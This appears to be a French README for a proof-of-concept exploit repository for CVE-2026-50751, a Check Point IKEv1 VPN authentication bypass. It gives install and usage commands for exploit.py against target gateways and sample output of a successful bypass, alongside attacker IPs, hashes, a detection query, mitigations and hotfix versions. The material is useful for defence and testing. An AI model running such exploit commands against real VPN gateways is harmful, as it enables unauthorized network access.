
Vulnérabilité : Faiblesse de flux logique dans l'accès à distance et l'accès mobile
Ce code est UNIQUEMENT à des fins éducatives et de tests de sécurité autorisés. L'utilisation non autorisée contre des systèmes sans permission explicite est ILLÉGALE. L'auteur n'est pas responsable de l'usage abusif de cet outil.
CVE-2026-50751 est une vulnérabilité critique de contournement d'authentification dans le protocole IKEv1 (obsolète) de Check Point, affectant Remote Access VPN et Mobile Access. Un attaquant non authentifié peut exploiter une faille dans la validation des certificats pour établir une connexion VPN sans mot de passe valide.
| Produit | Versions |
|---|---|
| Security Gateways | R80.40 - R82.10 avec IKEv1 activé |
| Spark Firewalls | R80.20.X, R81.10.X, R82.00.X |
| Mobile Access | Toutes les versions avec IKEv1 |
# Cloner le dépôt
git clone https://github.com/username/CVE-2026-50751-PoC
cd CVE-2026-50751-PoC
# Installer les dépendances
pip install -r requirements.txt
# Donner les permissions d'exécution
chmod +x exploit.py
cryptography>=41.0.0
scapy>=2.5.0
# Détecter si IKEv1 est activé
python3 detector.py -t 192.168.1.1 -p 500
# Analyse rapide
python3 detector.py -t vpn.target.com -p 4500
# Exécuter le contournement d'authentification
python3 exploit.py -t 192.168.1.1 -p 500
# Avec une interface spécifique
python3 exploit.py -t vpn.target.com --interface eth0
# Mode verbeux
python3 exploit.py -t 192.168.1.1 -p 500 -v
╔═══════════════════════════════════════════════════════════════╗
║ CVE-2026-50751 - Check Point IKEv1 Authentication Bypass ║
║ Critical VPN Authentication Bypass Exploit ║
║ CVSS: 9.3 | CISA KEV: 2026-06-08 ║
╚═══════════════════════════════════════════════════════════════╝
[1] Initiating IKEv1 Main Mode...
[+] Received response - SPI: a1b2c3d4e5f67890
[2] Sending crafted KE + NONCE payloads...
[+] Gateway accepted crafted KE/NONCE - Vulnerability triggered!
[3] Calculating authentication keys...
[4] Sending spoofed authentication...
[+] SUCCESS! Authentication bypassed!
[+] Established IKE SA without valid credentials
[5] Establishing VPN tunnel...
[+] VPN tunnel established!
[+] Internal network access available
[✓] EXPLOIT SUCCESSFUL
[✓] Authentication bypass achieved
[✓] VPN tunnel established
[!] System is VULNERABLE - Apply hotfix immediately
# Requête pour détecter les attaquants
action:"Key Install" AND (src:45.77.149.152 OR dst:45.77.149.152)
| Type | Valeur |
|---|---|
| IPs attaquantes | 45.77.149.152, 209.182.225.136, 38.60.157.139, 162.33.177.101, 45.76.26.42, 144.208.127.155, 38.54.88.201, 38.54.107.167, 66.42.99.200, 45.63.104.106, 45.61.136.173 |
| Hashs | 52fda5c1b9704544f32ee98d9060e689, 51d39aa39478beeac94f2d12f682ecce |
| Version | Hotfix Take | Lien |
|---|
Désactiver les clients hérités :
SmartConsole → Gateway → VPN Clients → Authentication
Décocher "Allow older clients"
Forcer uniquement IKEv2 :
Global Properties → Remote Access → VPN Authentication
Sélectionner "IKEv2 only"
Rendre obligatoire le certificat machine :
VPN Clients → Authentication → Machine Certificate Authentication
Définir sur "Mandatory"
| Date | Événement |
|---|---|
| 2026-05-07 | Première exploitation observée |
| 2026-06-04 | Check Point lance l'enquête |
| 2026-06-08 | CVE publié, CISA ajoute au KEV |
| 2026-06-11 | Date limite CISA pour corriger |
Ce logiciel est fourni "en l'état", sans garantie d'aucune sorte. L'auteur n'est pas responsable de l'usage abusif de cet outil. Utilisez-le uniquement sur des systèmes que vous possédez ou pour lesquels vous avez une autorisation explicite de test.
Pour signaler des bogues ou contribuer :
⭐ Si ce PoC vous a été utile, pensez à laisser une étoile au dépôt
cryptography>=41.0.0
scapy>=2.5.0
colorama>=0.4.6
⚠️ Note importante pour GitHub :
| R82.10 | Take 19 | Télécharger |
| R82 | Take 103 | Télécharger |
| R81.20 | Take 141 | Télécharger |